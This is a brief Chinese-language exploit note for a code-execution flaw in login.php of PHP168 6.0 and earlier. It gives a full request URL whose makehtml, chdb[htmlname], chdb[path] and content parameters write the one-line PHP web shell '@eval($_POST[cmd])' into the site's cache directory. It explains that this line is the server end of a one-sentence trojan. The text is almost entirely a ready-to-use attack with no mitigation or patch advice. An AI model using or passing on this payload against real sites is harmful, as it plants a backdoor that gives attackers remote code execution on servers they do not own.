PHP168 6.0及以下版本login.php代码执行
在其域名后加上这样一段代码:
login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>。
这段代码 的意思利用login.php文件将
<?php%20@eval($_POST[cmd]);?>
这段代码写入到网站缓存目录 cache的xx.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句话木马的服务端。
URL是
http://www.xx.com/login.php?makehtml=1&chdb[htmlname]=xx.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>